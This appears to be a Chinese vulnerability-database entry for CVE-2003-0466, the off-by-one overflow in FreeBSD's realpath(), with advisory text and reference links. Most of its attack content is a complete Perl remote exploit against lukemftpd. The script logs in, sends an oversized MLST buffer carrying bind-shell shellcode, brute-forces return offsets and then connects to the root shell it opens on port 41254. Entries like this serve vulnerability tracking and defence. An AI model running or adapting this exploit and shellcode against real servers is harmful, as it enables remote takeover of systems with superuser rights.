多家厂商C程序库realpath()单字节缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107434 漏洞类型 边界条件错误
发布时间 2003-07-31 更新时间 2007-05-15
CVE编号 CVE-2003-0466 CNNVD-ID CNNVD-200308-136
漏洞平台 FreeBSD CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/22976
https://www.securityfocus.com/bid/8315
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-136
|漏洞详情
realpath(3)函数用于在给出的路径名中判断规则的绝对路径名,给出的路径名可能包含``/''字符,并涉及到如``/./''或``/../''、符号连接等,realpath(3)函数是FreeBSD标准C语言库文件的一部分。realpath(3)函数在计算解析获得的路径名长度时存在单字节溢出问题,本地或者远程攻击者可以利用这个漏洞对利用此函数的服务进行缓冲区溢出攻击,可以以进程权限在系统上执行任意指令。如果解析获得的路径名是1024字节长,并包含两个目录分割符,缓冲区传递给realpath(3)函数时就可以被单NUL字节覆盖。一般使用realpath(3)函数的应用程序可产生拒绝服务,或者执行任意代码和权限提升攻击。在FreeBSD系统中,多个应用程序使用了realpath(3)函数,如:lukemftpd(8)是一个变种FTP服务器,realpath(3)用于处理MLST和MLSD命令,这个漏洞可被利用以超级用户权限执行任意代码。sftp-server(8)是OpenSSH的一部分,realpath(3)用于处理chdir命令,这个漏洞可被利用以验证用户权限执行任意代码。在FreeBSD4.8-RELEASE的版本中,FreeBSD的PORT集包含如下应用程序使用了realpath(3),不过没有审核是否存在此漏洞,或者可以被利用:BitchX-1.0c19_1Mowitz-0.2.1_1XFree86-clients-4.3.0_1abcache-0.14aim-1.5.234analog-5.24,1anjuta-1.0.1_1aolserver-3.4.2argus-2.0.5arm-rtems-gdb-5.2_1avr-gdb-5.2.1ccache-2.1.1cdparanoia-3.9.8_4cfengine-1.6.3_4cfengine2-2.0.3cmake-1.4.7comserv-1.4.3criticalmass-0.97dedit-0.6.2.3_1drweb_postfix-4.29.10adrweb-4.29.2drweb_sendmail-4.29.10aedonkey-gui-gtk-0.5.0enca-0.10.7epic4-1.0.1_2evolution-1.2.2_1exim-3.36_1exim-4.12_5exim
|漏洞EXP
source: http://www.securityfocus.com/bid/8315/info
  
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
  
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
  
NOTE: Patching the C library alone may not remove all instances of this vulnerability. Statically linked programs may need to be rebuilt with a patched version of the C library. Also, some applications may implement their own version of 'realpath()'. These applications would require their own patches. FreeBSD has published a large list of applications that use 'realpath()'. Administrators of FreeBSD and other systems are urged to review it. For more information, see the advisory 'FreeBSD-SA-03:08.realpath'.

#!/usr/bin/perl

#realpath lukemftpd remote exploit for freeBSD 4.8
#i managed to code this, and lose the first copy, hence a re-write :(
#deadbeat,
#left without any return addresses/offsets purposely to stop kids using it..
#want the rets/offsets? heh..
#
#tested on freeBSD 4.8 and it worked ;) it worked ;)
#e: daniels@legend.co.uk
#e: deadbeat@sdf.lonestar.org

use IO::Socket;

$user = $ARGV[0];
$pass = $ARGV[1];
$ret = $ARGV[2];
$offset = $ARGV[3];
$host = $ARGV[4];
$buf= 1024;
$n = "./";
print "lukemftpd remote for FreeBSD 4.8 ..\n";
print "this is the kiddiot version, go grab them ret's+offsets..lool\n";
print "contact me and i might give u the rets/offsets\n";
if(!$ARGV[4]){
	die "Usage: perl $0 <user> <pass> <ret> <offset> <host>\n";
}
sub brute_force
{
	$r = $_[0];
	$o = $_[1];

		#shellcode from zillion.. from safemode.org...binds /bin/sh on 41254
	$hell =	"\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0".
        		"\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46".
        		"\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0".
        		"\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80".
        		"\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff".
        		"\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01".
        		"\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff".
        		"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";

	$addr = pack('l', ($r+$o));
	for($i=0;$i <$buf; $i +=4){
		$buffer .=$addr;
	}
	for($i=0;$i<$buf - length($hell) /2;$i++){
		$buffer .=$n;
	}
	$buffer .=$hell;

	print "Connecting to: $host\n";
	$sox = IO::Socket::INET->new(
		Proto=>"tcp",
		PeerPort=>"21",
		PeerAddr=>"$host"
	)or die "cant connect to $host ...maybe try a real host ;)\n";
	sleep 1;
	print ("[+]Trying addr: 0x", sprintf('%lx', ($r + $o)),"\n");
	print $sox "user $user\r\n";
	sleep 1;
	print "pass $pass\r\n";
	sleep 1;
	print $sox "MLST $buffer\r\n";
	sleep 2;
	close $sox;
	print "Trying to connect to r00tshell\n";
	$sox = IO::Socket::INET->new(
		Proto=>"tcp",
		PeerPort=>"41254",
		PeerAddr=>"$host"
	)or die"No r00tshell this time, try using a proper offset/ret_addr..\n";
	print "Wicked we got a r00tshell on $host : 41254\n\n";
	close $sox;
}

for($a=0;$a<1000;$a++){
	$offset++;
	$reta = pack('l', ($ret+$o));
	print "Brute Force [$a]\n";
	brute_force($reta,$offset);
}
|受影响的产品
Washington University wu-ftpd 2.6.2 + Compaq Tru64 5.1 b PK2 (BL22) + Compaq Tru64 5.1 b PK1 (BL1) + Compaq Tru64 5.1
|参考资料

来源:US-CERTVulnerabilityNote:VU#743092
名称:VU#743092
链接:http://www.kb.cert.org/vuls/id/743092
来源:BID
名称:8315
链接:http://www.securityfocus.com/bid/8315
来源:XF
名称:libc-realpath-offbyone-bo(12785)
链接:http://xforce.iss.net/xforce/xfdb/12785
来源:TURBO
名称:TLSA-2003-46
链接:http://www.turbolinux.com/security/TLSA-2003-46.txt
来源:BUGTRAQ
名称:20060214Re:Latestwu-ftpdexploit:-s
链接:http://www.securityfocus.com/archive/1/425061/100/0/threaded
来源:BUGTRAQ
名称:20060213Latestwu-ftpdexploit:-s
链接:http://www.securityfocus.com/archive/1/424852/100/0/threaded
来源:REDHAT
名称:RHSA-2003:246
链接:http://www.redhat.com/support/errata/RHSA-2003-246.html
来源:REDHAT
名称:RHSA-2003:245
链接:http://www.redhat.com/support/errata/RHSA-2003-245.html
来源:OSVDB
名称:6602
链接:http://www.osvdb.org/6602
来源:SUSE
名称:SuSE-SA:2003:032
链接:http://www.novell.com/linux/security/advisories/2003_032_wuftpd.html
来源:DEBIAN
名称:DSA-357
链接:http://www.debian.org/security/2003/dsa-357
来源:SUNALERT
名称:1001257
链接:http://sunsolve.sun.com/search/document.do?assetkey